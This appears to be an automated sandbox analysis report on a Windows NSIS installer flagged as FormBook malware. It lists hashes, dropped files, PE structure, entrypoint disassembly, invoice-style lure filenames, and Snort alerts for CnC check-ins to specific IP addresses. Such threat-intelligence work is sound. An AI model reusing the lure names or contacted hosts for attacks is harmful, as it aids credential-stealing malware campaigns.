                                                              • 45.195.169.197

                                                              ASN

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              CLOUDFLARENETUSw1iSiwLXiV.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              TKeRmCuiit.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              c71fd2gJus.exeGet hashmaliciousBrowse
                                                              • 172.67.222.38
                                                              BrBsL8sBvm.exeGet hashmaliciousBrowse
                                                              • 172.67.188.69
                                                              New Order PO2193570O1.docGet hashmaliciousBrowse
                                                              • 162.159.134.233
                                                              Proforma Invoice.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              00010200390_0192021.pdf.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              Payment Advice.pdf.docGet hashmaliciousBrowse
                                                              • 104.21.19.200
                                                              Urgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              bL6FwQU4K5.exeGet hashmaliciousBrowse
                                                              • 172.67.163.99
                                                              E1a92ARmPw.exeGet hashmaliciousBrowse
                                                              • 104.21.62.88
                                                              crt9O3URua.exeGet hashmaliciousBrowse
                                                              • 172.67.38.66
                                                              fuoAl0V94I.exeGet hashmaliciousBrowse
                                                              • 172.67.162.27
                                                              Consignment Details&Original BL Draft.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              E1a92ARmPw.exeGet hashmaliciousBrowse
                                                              • 172.67.38.66
                                                              2320900000000.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              3JDjILxXaA.exeGet hashmaliciousBrowse
                                                              • 172.67.154.4
                                                              NEW ORDER 112888#.exeGet hashmaliciousBrowse
                                                              • 104.21.19.200
                                                              Transfer-Advice000601021_PDF.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              _VM0_03064853.HtMGet hashmaliciousBrowse
                                                              • 104.18.10.207
                                                              CLOUDFLARENETUSw1iSiwLXiV.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              TKeRmCuiit.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              c71fd2gJus.exeGet hashmaliciousBrowse
                                                              • 172.67.222.38
                                                              BrBsL8sBvm.exeGet hashmaliciousBrowse
                                                              • 172.67.188.69
                                                              New Order PO2193570O1.docGet hashmaliciousBrowse
                                                              • 162.159.134.233
                                                              Proforma Invoice.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              00010200390_0192021.pdf.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              Payment Advice.pdf.docGet hashmaliciousBrowse
                                                              • 104.21.19.200
                                                              Urgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              bL6FwQU4K5.exeGet hashmaliciousBrowse
                                                              • 172.67.163.99
                                                              E1a92ARmPw.exeGet hashmaliciousBrowse
                                                              • 104.21.62.88
                                                              crt9O3URua.exeGet hashmaliciousBrowse
                                                              • 172.67.38.66
                                                              fuoAl0V94I.exeGet hashmaliciousBrowse
                                                              • 172.67.162.27
                                                              Consignment Details&Original BL Draft.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              E1a92ARmPw.exeGet hashmaliciousBrowse
                                                              • 172.67.38.66
                                                              2320900000000.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              3JDjILxXaA.exeGet hashmaliciousBrowse
                                                              • 172.67.154.4
                                                              NEW ORDER 112888#.exeGet hashmaliciousBrowse
                                                              • 104.21.19.200
                                                              Transfer-Advice000601021_PDF.exeGet hashmaliciousBrowse
                                                              • 172.67.188.154
                                                              _VM0_03064853.HtMGet hashmaliciousBrowse
                                                              • 104.18.10.207
                                                              AS-26496-GO-DADDY-COM-LLCUS5t2CmTUhKc.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              DNPr7t0GMY.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              SKlGhwkzTi.exeGet hashmaliciousBrowse
                                                              • 192.169.223.13
                                                              5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              619wGDCTZA.exeGet hashmaliciousBrowse
                                                              • 23.229.215.137
                                                              Documents_13134976_1377491379.xlsbGet hashmaliciousBrowse
                                                              • 107.180.50.232
                                                              #U00a0Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              Payment receipt MT103.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              research-531942606.xlsbGet hashmaliciousBrowse
                                                              • 72.167.211.83
                                                              research-121105165.xlsbGet hashmaliciousBrowse
                                                              • 72.167.211.83
                                                              research-76934760.xlsbGet hashmaliciousBrowse
                                                              • 72.167.211.83
                                                              research-1960540844.xlsxGet hashmaliciousBrowse
                                                              • 72.167.211.83
                                                              research-1110827633.xlsbGet hashmaliciousBrowse
                                                              • 72.167.211.83
                                                              DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                                              • 148.66.138.158
                                                              New Order.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              DocumentScanCopy202_pdf.exeGet hashmaliciousBrowse
                                                              • 148.66.138.158
                                                              NEW ORDER ZIP.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              oVA5JBAJutcna88.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241
                                                              qXDtb88hht.exeGet hashmaliciousBrowse
                                                              • 184.168.131.241

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll5t2CmTUhKc.exeGet hashmaliciousBrowse
                                                                8qdfmqz1PN.exeGet hashmaliciousBrowse
                                                                  New Order PO2193570O1.docGet hashmaliciousBrowse
                                                                    L2.xlsxGet hashmaliciousBrowse
                                                                      Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxGet hashmaliciousBrowse
                                                                        New Order PO2193570O1.pdf.exeGet hashmaliciousBrowse
                                                                          2320900000000.exeGet hashmaliciousBrowse
                                                                            CshpH9OSkc.exeGet hashmaliciousBrowse
                                                                              5SXTKXCnqS.exeGet hashmaliciousBrowse
                                                                                i6xFULh8J5.exeGet hashmaliciousBrowse
                                                                                  AWB00028487364 -000487449287.docGet hashmaliciousBrowse
                                                                                    090049000009000.exeGet hashmaliciousBrowse
                                                                                      dYy3yfSkwY.exeGet hashmaliciousBrowse
                                                                                        PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsxGet hashmaliciousBrowse
                                                                                          Purchase Order Price List 061021.xlsxGet hashmaliciousBrowse
                                                                                            Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                              UGGJ4NnzFz.exeGet hashmaliciousBrowse
                                                                                                Proforma Invoice and Bank swift-REG.PI-0086547654.exeGet hashmaliciousBrowse
                                                                                                  3arZKnr21W.exeGet hashmaliciousBrowse
                                                                                                    Shipping receipt.exeGet hashmaliciousBrowse

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Temp\nssF13F.tmp
                                                                                                      Process:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):261012
                                                                                                      Entropy (8bit):7.3456635705707685
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:9ob3S8T7kC7sf3eG3Jw24DKBGNLtqEZpG+x6t:iz7kC7sf3t3EFtpDGma
                                                                                                      MD5:AF69C1313ADD571627D87D2453F87D28
                                                                                                      SHA1:97818C9D2B9E8794F97D27CF0EBC2A763639F5E0
                                                                                                      SHA-256:6AFC732265B4C7257FF86EEE7AA8AD9E25DA0E0BA996CE425BDFF07EBF2B4349
                                                                                                      SHA-512:8C9E2FC2BADD92D495FAB633AC537842665F59B90D04CF2AAA8BDDBD06D25CEA631153C842F08C29AFE83129583D82CD48EFCD7DAA4CCAE3662A02563ED3ABC0
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: .m......,.......................LP......-l.......l..............................................................#...........................................................................................................................................................................J...................j...........................................................................................................................................W...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll
                                                                                                      Process:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11776
                                                                                                      Entropy (8bit):5.855045165595541
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                                      MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                                      SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                                      SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                                      SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: 5t2CmTUhKc.exe, Detection: malicious, Browse
                                                                                                      • Filename: 8qdfmqz1PN.exe, Detection: malicious, Browse
                                                                                                      • Filename: New Order PO2193570O1.doc, Detection: malicious, Browse
                                                                                                      • Filename: L2.xlsx, Detection: malicious, Browse
                                                                                                      • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious, Browse
                                                                                                      • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious, Browse
                                                                                                      • Filename: 2320900000000.exe, Detection: malicious, Browse
                                                                                                      • Filename: CshpH9OSkc.exe, Detection: malicious, Browse
                                                                                                      • Filename: 5SXTKXCnqS.exe, Detection: malicious, Browse
                                                                                                      • Filename: i6xFULh8J5.exe, Detection: malicious, Browse
                                                                                                      • Filename: AWB00028487364 -000487449287.doc, Detection: malicious, Browse
                                                                                                      • Filename: 090049000009000.exe, Detection: malicious, Browse
                                                                                                      • Filename: dYy3yfSkwY.exe, Detection: malicious, Browse
                                                                                                      • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious, Browse
                                                                                                      • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious, Browse
                                                                                                      • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                      • Filename: UGGJ4NnzFz.exe, Detection: malicious, Browse
                                                                                                      • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious, Browse
                                                                                                      • Filename: 3arZKnr21W.exe, Detection: malicious, Browse
                                                                                                      • Filename: Shipping receipt.exe, Detection: malicious, Browse
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Users\user\AppData\Local\Temp\x8abgzdx2taarfhvmdw
                                                                                                      Process:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):164352
                                                                                                      Entropy (8bit):7.998740117796754
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:WI3SWiaT7vg17lM7sf37lghuFa47Zrw24HAsFUyzyBGNmqDv:93S8T7kC7sf3eG3Jw24DKBGNLz
                                                                                                      MD5:D6A1573FFB40613104C0755D78241AB4
                                                                                                      SHA1:8567FBE29F2DE39618F8FC5EEAFB18F5C6B9D4AD
                                                                                                      SHA-256:B3132DA42852DD7F3C7BD9044AF9FB0916F9B8C6C6854B572F2CA6424CF2FECD
                                                                                                      SHA-512:6042A74B4572B2D04182EE3B8E6BF0D5518B4C752C887FB8AB770A5B8D385B5E58500EA4DE980227E577DABE9DD01B457F700ECECDA107180646DB8ADCE80981
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: ....^..#.5...AW|.r.."*..n.............h.o....I....=.+.O5.uK...;...@.A..=-%-6\..u$.e.AL...2L.JY..F@p...O..a..F....F.\.......,.d8..G.H...A.V..Pz..K.w.2.p7.b`..?.....84..[.)'..`g0..r......_cC..A.c.....9.A..v.5.TJ.~.+.EB.&..?..4.......p..#&.Z.d<p.SQl.gA.(..J.0....`=m.p`..,..:U[wd...b.....].K^....z..3Ekx..d.x.|i...E.0.......f=*.k... jG..5D...l...p^ x..7.c..$....!...h....i.......L*...a..P....}6t.{.(xq.~N|}......%G...,SGlG..{_..o.9...'.?....ap!.F....[.].9s..Y...Y8.3%o.:n.Wp..MN....'.b...d...</.w.*T6)...g.0B}G.B.w%.g....H.F...L....L..ks.q7r..i..Us9..g..G5.v..Y....8r.I.j2.......~uPw....2....N..w..$5.......^....p....V.amT.t....RT..hf.t.....,...H.8...Q#..Fd..._...g...Kz..T.Z..\w .A......{..G..........c....1.X6.R1`.E.U..l..H.?)K...{....'@...PR(......?%2#....j...A.?.M...f.2..v..t=.+..q..fzF..C...C....KR......'.....".cr"..7p96....J|q...x..T.....nc...^..k.fP......... .0g.H.w.y..Lt"n.D..]&?I..iu..~..e.._p.......8R......9sv=K.M..%...Q.4.=q.4...aH@.q^.+..g..;
                                                                                                      C:\Users\user\AppData\Local\Temp\yerrxvolv
                                                                                                      Process:C:\Users\user\Desktop\KY4cmAI0jU.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):56945
                                                                                                      Entropy (8bit):4.916897762190798
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:5HwlaCciRuhiRUidh5HAYBe16mKqrk5US/zf6Up:NacPUXHl06pG+US/OO
                                                                                                      MD5:83D3E22048178472A2287533D5C2FE99
                                                                                                      SHA1:CA6E1F360EF458E914968D27963E2E821B281080
                                                                                                      SHA-256:98B4220FF7F5974B33154C161C82A814078FE0D670726F0C62CBCB17F9A0A8FE
                                                                                                      SHA-512:7151EEF108AFDCB5B7794718128973A4941197ED572AF9F20E68CB5637CC8DF2A17555765E45C101787EE7EB2D662C54E74EA5229890C90DB2C11CC24D1198F2
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: U.......3.... .....!.....".....#.....$.....%...o.&.....'.....(.....).....*...8.+.....,...o.-.........../.....0.....1.....2.....3.....4.....5.....6.....7... .8.....9...1.:.....;.....<.....=.....>.....?.....@.....A.....B...0.C...k.D.....E.....F.....G...g.H.....I.....J...H.K.....L.....M.....N.....O...r.P.....Q.....R.....S.....T.....U.....V...k.W.....X.....Y.....Z.....[.....\.....]...k.^....._.....`...].a...X.b...1.c.....d.....e.....f.....g.....h.....i.....j.....k...<.l...y.m...y.n...y.o...k.p.....q...x.r.....s...g.t.....u.....v...H.w.....x.....y.....z...x.{...r.|.....}.....~...............x...........k...........x.............................k.................].....X.....1...........................................................y.....y.....y.....k.......................g.................H.............................r..............................

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                      Entropy (8bit):7.912728398567341
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:KY4cmAI0jU.exe
                                                                                                      File size:224710
                                                                                                      MD5:8c35ac8d43f7e59105902fa16114144e
                                                                                                      SHA1:c1a0e5de1121e55c22649182c923b41efd4e2848
                                                                                                      SHA256:1a08fc838c4ebab6b986b6010e2074a05c29916cd38096e7f7d26a6455917508
                                                                                                      SHA512:f89da0804389f71e3627b9bcc5299d6eaab0649197d1084fb3b6f63e4bd126baf333c9781aa02c3666ac59e79cb645487cfdbe19061b1c5119098529bfbd7f18
                                                                                                      SSDEEP:6144:Ds9p+npLadPGnTF8SnI8ey8uLSJB6+i940vqC7J:yptdenTiSnI8ethi9aaJ
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                                      File Icon

                                                                                                      Icon Hash:b2a88c96b2ca6a72

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x40323c
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      sub esp, 00000180h
                                                                                                      push ebx
                                                                                                      push ebp
                                                                                                      push esi
                                                                                                      xor ebx, ebx
                                                                                                      push edi
                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                      mov dword ptr [esp+10h], 00409130h
                                                                                                      xor esi, esi
                                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                                      call dword ptr [00407030h]
                                                                                                      push 00008001h
                                                                                                      call dword ptr [004070B4h]
                                                                                                      push ebx
                                                                                                      call dword ptr [0040727Ch]
                                                                                                      push 00000008h
                                                                                                      mov dword ptr [00423F58h], eax
                                                                                                      call 00007F5D0CDC427Eh
                                                                                                      mov dword ptr [00423EA4h], eax
                                                                                                      push ebx
                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                      push 00000160h
                                                                                                      push eax
                                                                                                      push ebx
                                                                                                      push 0041F458h
                                                                                                      call dword ptr [00407158h]
                                                                                                      push 004091B8h
                                                                                                      push 004236A0h
                                                                                                      call 00007F5D0CDC3F31h
                                                                                                      call dword ptr [004070B0h]
                                                                                                      mov edi, 00429000h
                                                                                                      push eax
                                                                                                      push edi
                                                                                                      call 00007F5D0CDC3F1Fh
                                                                                                      push ebx
                                                                                                      call dword ptr [0040710Ch]
                                                                                                      cmp byte ptr [00429000h], 00000022h
                                                                                                      mov dword ptr [00423EA0h], eax
                                                                                                      mov eax, edi
                                                                                                      jne 00007F5D0CDC167Ch
                                                                                                      mov byte ptr [esp+14h], 00000022h
                                                                                                      mov eax, 00429001h
                                                                                                      push dword ptr [esp+14h]
                                                                                                      push eax
                                                                                                      call 00007F5D0CDC3A12h
                                                                                                      push eax
                                                                                                      call dword ptr [0040721Ch]
                                                                                                      mov dword ptr [esp+1Ch], eax
                                                                                                      jmp 00007F5D0CDC16D5h
                                                                                                      cmp cl, 00000020h
                                                                                                      jne 00007F5D0CDC1678h
                                                                                                      inc eax
                                                                                                      cmp byte ptr [eax], 00000020h
                                                                                                      je 00007F5D0CDC166Ch
                                                                                                      cmp byte ptr [eax], 00000022h
                                                                                                      mov byte ptr [eax+eax+00h], 00000000h

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                                      RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                                      RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                                      RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                                      RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                                      RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                      USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                      SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      06/11/21-09:02:36.107449TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.3172.67.206.33
                                                                                                      06/11/21-09:02:36.107449TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.3172.67.206.33
                                                                                                      06/11/21-09:02:36.107449TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.3172.67.206.33
                                                                                                      06/11/21-09:02:57.061426TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.3104.21.89.72
                                                                                                      06/11/21-09:02:57.061426TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.3104.21.89.72
                                                                                                      06/11/21-09:02:57.061426TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.3104.21.89.72
                                                                                                      06/11/21-09:03:13.687930TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.33.34.12.41
                                                                                                      06/11/21-09:03:13.687930TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.33.34.12.41
                                                                                                      06/11/21-09:03:13.687930TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.33.34.12.41
                                                                                                      06/11/21-09:03:33.391097ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                                                      06/11/21-09:03:34.391709ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jun 11, 2021 09:02:36.064456940 CEST4973080192.168.2.3172.67.206.33
                                                                                                      Jun 11, 2021 09:02:36.107199907 CEST8049730172.67.206.33192.168.2.3
                                                                                                      Jun 11, 2021 09:02:36.107331991 CEST4973080192.168.2.3172.67.206.33
                                                                                                      Jun 11, 2021 09:02:36.107449055 CEST4973080192.168.2.3172.67.206.33
                                                                                                      Jun 11, 2021 09:02:36.152012110 CEST8049730172.67.206.33192.168.2.3
                                                                                                      Jun 11, 2021 09:02:36.198753119 CEST8049730172.67.206.33192.168.2.3
                                                                                                      Jun 11, 2021 09:02:36.199132919 CEST4973080192.168.2.3172.67.206.33
                                                                                                      Jun 11, 2021 09:02:36.199173927 CEST8049730172.67.206.33192.168.2.3
                                                                                                      Jun 11, 2021 09:02:36.199248075 CEST4973080192.168.2.3172.67.206.33
                                                                                                      Jun 11, 2021 09:02:36.243094921 CEST8049730172.67.206.33192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.330689907 CEST4973680192.168.2.3104.18.193.20
                                                                                                      Jun 11, 2021 09:02:46.375637054 CEST8049736104.18.193.20192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.375842094 CEST4973680192.168.2.3104.18.193.20
                                                                                                      Jun 11, 2021 09:02:46.375958920 CEST4973680192.168.2.3104.18.193.20
                                                                                                      Jun 11, 2021 09:02:46.418087006 CEST8049736104.18.193.20192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.430977106 CEST8049736104.18.193.20192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.431135893 CEST8049736104.18.193.20192.168.2.3
